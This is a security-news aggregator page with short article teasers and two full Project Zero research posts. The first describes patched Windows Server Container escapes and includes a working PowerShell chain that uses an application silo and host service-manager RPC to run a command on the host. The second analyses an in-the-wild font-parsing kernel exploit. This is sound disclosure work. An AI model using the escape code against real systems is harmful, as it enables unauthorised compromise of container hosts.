L3 Technologies, a U.S. government contractor that sells aerospace and defense technology, has emerged as a suitor for Israeli exploit merchant NSO Group. read more
...moreTotal Articles Found: 31
Top sources:
Top Keywords:
Top Authors
Top Articles:
Published: 2022-06-14 16:18:52
Popularity: 9
Author: Ryan Naraine
Keywords:
L3 Technologies, a U.S. government contractor that sells aerospace and defense technology, has emerged as a suitor for Israeli exploit merchant NSO Group. read more
...morePublished: 2022-05-19 17:35:51
Popularity: 13
Author: Ryan Naraine
Keywords:
Security researchers at SentinelLabs are calling attention to a software chain supply attack targeting Rust developers with malware aimed directly at infecting GitLab Continuous Integration (CI) pipelines. read more
...morePublished: 2022-04-12 17:36:50
Popularity: 21
Author: Ryan Naraine
Keywords:
Adobe's security update engine revved into overdrive this month with the release of patches for at least 78 documented software vulnerabilities, some serious enough to expose corporate customers to remote code execution attacks. read more
...morePublished: 2022-03-17 15:58:58
Popularity: 20
Author: Ryan Naraine
Keywords:
Software supply chain security fears escalated again this week with the discovery of what’s being described as "deliberate sabotage" of code in the open-source npm package manager ecosystem. read more
...moreThe post Bypassing Little Snitch Firewall with Empty TCP Packets appeared first on Rhino Security Labs.
...morePublished: 2021-11-29 19:03:13
Popularity: 23
Author: Ryan Naraine
Keywords:
Video conferencing software giant Zoom has shipped patches for a pair of security defects that expose Windows, macOS, Linux, iOS and Android users to malicious hacker attacks. read more
...morePublished: 2021-11-16 16:39:16
Popularity: 15
Author: Ryan Naraine
Keywords:
Microsoft-owned GitHub is again flagging major security problems in the npm registry, warning that a pair of newly discovered vulnerabilities continue to expose the soft underbelly of the open-source software supply chain. read more
...morePublished: 2021-09-29 17:03:38
Popularity: 5
Author: Ryan Naraine
Keywords:
Edge security and content delivery giant Akamai Technologies on Wednesday announced plans to spend $600 million to acquire Guardicore, an Israeli micro-segmentation technology startup. Akamai said the deal would add new capabilities to help customers thwart ransomware attacks by blocking the spread of malware within an already-compromised enterprise. read more
...morePublished: 2021-09-23 20:39:09
Popularity: 8
Author: Ryan Naraine
Keywords:
Apple on Thursday confirmed a new zero-day exploit hitting older iPhones and warned that the security vulnerability also affects the macOS Catalina platform. read more
...morePublished: 2021-09-13 21:51:32
Popularity: 29
Author: Ryan Naraine
Keywords:
Google has joined the list of major software providers scrambling to respond to zero-day exploits in the wild. read more
...morePublished: 2021-08-20 01:04:34
Popularity: None
Author: Ryan Browne
Japanese cryptocurrency exchange Liquid said some of its digital currency wallets have been "compromised."
...morePublished: 2021-08-17 23:14:52
Popularity: 12
Author: Ryan Naraine
Keywords:
Adobe has issued a warning for a pair of major security vulnerabilities affecting its popular Photoshop image manipulation software. The flaws, rated critical, expose both Windows and MacOS users to code execution attacks, Adobe said in an advisory released Tuesday. read more
...morePublished: 2021-07-13 15:08:49
Popularity: 40
Author: Ryan Naraine
Keywords:
Adobe has issued multiple security advisories with patches for critical vulnerabilities in a wide range of software products, including the ever-present Adobe Acrobat and Reader application. read more
...morePublished: 2021-04-01 16:06:00
Popularity: 9
Author: Ryan
Posted by James Forshaw, Project Zero
This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.
Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.
The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.
The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.
For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.
Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.
There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.
Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.
The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.
As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.
Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers.
Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.
The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done easier without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.
Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.
Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of the ContainerAdministrator. As the reported issue only works when running as an administrator that would seem to be sufficient.
However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.
While I wasn’t expecting MS to fix anything I found it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?
The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.
Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.
Realistically it’s best to just use Docker which takes the MS provided Go wrapper and implements the more familiar Docker CLI. While there’s likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise which is only for server systems and Desktop. I primarily used Desktop for convenience.
As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.
Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:
FROM mcr.microsoft.com/windows/servercore:20H2 USER ContainerUser COPY NtObjectManager c:/NtObjectManager CMD [ "powershell", "-noexit", "-command", \ "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ] |
This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.
Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.
Create a directory and copy the contents of the docker file to the filename dockerfile in that directory. Also copy in a copy of my PowerShell module into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.
C:\container> docker build -t test_image . Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2 ---> b29adf5cd4f0 Step 2/4 : USER ContainerUser ---> Running in ac03df015872 Removing intermediate container ac03df015872 ---> 31b9978b5f34 Step 3/4 : COPY NtObjectManager c:/NtObjectManager ---> fa42b3e6a37f Step 4/4 : CMD [ "powershell", "-noexit", "-command", "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ] ---> Running in 86cad2271d38 Removing intermediate container 86cad2271d38 ---> e7d150417261 Successfully built e7d150417261 Successfully tagged test_image:latest
C:\container> docker run --isolation=process -it test_image PS> |
I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.
I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.
PS> Get-Process -Name CExecSvc
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 86 6 1044 5020 4560 6 CExecSvc |
With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.
PS> Show-NtTokenEffective -User -Group -Privilege USER INFORMATION ---------------- Name Sid ---- --- User Manager\ContainerUser S-1-5-93-2-2
GROUP SID INFORMATION ----------------- Name Attributes ---- ---------- Mandatory Label\High Mandatory Level Integrity, ... Everyone Mandatory, ... BUILTIN\Users Mandatory, ... NT AUTHORITY\SERVICE Mandatory, ... CONSOLE LOGON Mandatory, ... NT AUTHORITY\Authenticated Users Mandatory, ... NT AUTHORITY\This Organization Mandatory, ... NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ... LOCAL Mandatory, ... User Manager\AllContainers Mandatory, ...
PRIVILEGE INFORMATION --------------------- Name Luid Enabled ---- ---- ------- SeChangeNotifyPrivilege 00000000-00000017 True SeImpersonatePrivilege 00000000-0000001D True SeCreateGlobalPrivilege 00000000-0000001E True SeIncreaseWorkingSetPrivilege 00000000-00000021 False |
The groups didn’t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system including administrators. MSRC considers having SeImpersonatePrivilege as administrator equivalent, meaning if you have it you can assume you can get to administrator. Seems ContainerUser is not quite as normal as it should be.
That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.
NextI used the NtObject drive provider to list the object manager namespace. For example checking the Device directory shows what device objects are available.
PS> ls NtObject:\Device
Name TypeName ---- -------- Ip SymbolicLink Tcp6 SymbolicLink Http Directory Ip6 SymbolicLink ahcache SymbolicLink WMIDataDevice SymbolicLink LanmanDatagramReceiver SymbolicLink Tcp SymbolicLink LanmanRedirector SymbolicLink DxgKrnl SymbolicLink ConDrv SymbolicLink Null SymbolicLink MailslotRedirector SymbolicLink NamedPipe Device Udp6 SymbolicLink VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink KsecDD SymbolicLink DeviceApi SymbolicLink MountPointManager Device ... |
Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.
What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.
PS> ls HKLM:\SOFTWARE | Select-Object Name Name ---- HKEY_LOCAL_MACHINE\SOFTWARE\Classes HKEY_LOCAL_MACHINE\SOFTWARE\Clients HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft HKEY_LOCAL_MACHINE\SOFTWARE\ODBC HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH HKEY_LOCAL_MACHINE\SOFTWARE\Policies HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications HKEY_LOCAL_MACHINE\SOFTWARE\Setup HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node
PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name Name ---- Classes Clients DefaultUserEnvironment Docker Inc. Intel Macromedia Microsoft ODBC OEM OpenSSH Partner Policies RegisteredApplications Windows WOW6432Node |
The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:
PS> ls NtObject:\REGISTRY\USER | Select-Object Name Name ---- .DEFAULT S-1-5-19 S-1-5-20 S-1-5-21-426062036-3400565534-2975477557-1001 S-1-5-21-426062036-3400565534-2975477557-1001_Classes S-1-5-21-426062036-3400565534-2975477557-1003 S-1-5-18
PS> Get-NtSid Name Sid ---- --- User Manager\ContainerUser S-1-5-93-2-2 |
No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container.
Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.
This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.
The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.
While just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches.
The main enforcement mechanism used by the kernel to provide the container’s isolation is by calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state. Unfortunately you’d be wrong, the following is a short list of the functions I checked:
IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo |
Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:
The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.
For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.
BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) { if (PsIsCurrentThreadInServerSilo() || !TargetHive || TargetHive == SourceHive) { return TRUE; } if (SourceHive->Flags.Trusted) return FALSE; // Check trust list. } |
Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.
To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.
The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.
POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) { if (Silo) { PPSP_STORAGE Storage = Silo->Storage; PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];
if (Slot->Present) return Slot->Value; }
return ObpRootDirectoryObject; } |
We can see that the function will extract a storage parameter from the passed-in silo, if present it will return the value of the slot. If the silo is NULL or the slot isn’t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory so this function should always return the silo root directory rather than the real global root directory.
This code seems perfectly fine, if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough, there are only two callers and they both have the following code.
PEJOB silo = PsGetCurrentSilo(); Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo); |
Okay, so the silo is coming from PsGetCurrentSilo. What does that do?
PEJOB PsGetCurrentSilo() { PETHREAD Thread = PsGetCurrentThread(); PEJOB silo = Thread->Silo; if (silo == (PEJOB)-3) { silo = Thread->Tcb.Process->Job; while(silo) { if (silo->JobFlags & EJOB_SILO) { break; } silo = silo->ParentJob; } } return silo; } |
A silo can be associated with a thread, through impersonation or as can be one job in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches for any job in the job hierarchy for the process for anything which has the JOB_SILO flag set. If a silo is found, it’s returned from the function, otherwise NULL would be returned.
This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager to using the root directory all we need to do is:
This is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you’re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.
The exploit in PowerShell is pretty straightforward using my toolchain:
PS> $root = Get-NtDirectory "\" PS> $root.FullPath \
PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory PS> Set-NtProcessJob $silo -Current PS> $root.FullPath \Silos\748 |
To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.
We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.
Now we can check the root directory path again. We now find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the root root directory. At this point you can access resources on the host through the object manager.
We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM, you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) using the ALPC port to create a new service. You don’t even need to copy an executable outside the container as the system volume for the container is an accessible device on the host we can just access.
As far as the host’s SCM is concerned you’re an administrator and so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run in the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service you will end up accessing the container’s SCM, not the hosts.
To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.
PS> $imp = $token.Impersonate() PS> $sym_path = "$env:SystemDrive\symbols" PS> mkdir $sym_path | Out-Null PS> $services_path = "$env:SystemRoot\system32\services.exe"
PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'
# You can also use the following to run a container based executable. #$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") { # "\\.\GLOBALROOT" + $f.FullPath #}
PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path | Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003' PS> $client = Get-RpcClient $rpc
PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory PS> Set-NtProcessJob $silo -Current PS> Connect-RpcClient $client -EndpointPath ntsvcs
PS> $scm = $client.ROpenSCManagerW([NullString]::Value, ` [NullString]::Value, ` [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService) PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", ` [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, ` [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0) PS> $client.RStartServiceW($service.p15, 0, $null) |
For this code to work it’s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host’s system drive.
I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.
I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120 which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant.
The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.
The situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run.
After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.
I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.
Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.
The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here.
Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.
Published: 2021-03-31 20:57:11
Popularity: 78
Author: Ryan Naraine
Keywords:
A North Korean government-backed APT group has been caught using a fake pen-testing company and a range of sock puppet social media accounts in an escalation of a hacking campaign targeting security research professionals. read more
...morePublished: 2021-01-28 20:31:16
Popularity: 70
Author: Ryan Naraine
Keywords:
Apple has quietly added several anti-exploit mitigations into its flagship mobile operating system in what appears to be a specific response to zero-click iMessage attacks observed in the wild. read more
...morePublished: 2021-01-12 17:37:00
Popularity: 48
Author: Ryan
This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero
In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.
The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).
On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).
Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.
The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:
int ParseBlendVToHOrigin(void *arg) { Fixed16_16 *ptrs[2]; Fixed16_16 values[2]; for (int i = 0; i < g_font->numMasters; i++) { ptrs[i] = &g_font->SomeArray[arg->SomeField + i]; } for (int i = 0; i < 2; i++) { int values_read = GetOpenFixedArray(values, g_font->numMasters); if (values_read != g_font->numMasters) { return -8; } for (int num = 0; num < g_font->numMasters; num++) { ptrs[num][i] = values[num]; } } return 0; } |
In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0–16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:
... | |
RSP + 0x30 | ptrs[0] |
RSP + 0x38 | ptrs[1] |
RSP + 0x40 | saved RDI |
RSP + 0x48 | return address |
RSP + 0x50 | values[0 .. 1] |
RSP + 0x58 | saved RBX |
RSP + 0x60 | saved RSI |
... |
The green rows indicate the user-controlled local arrays, and the red ones mark internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.
After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.
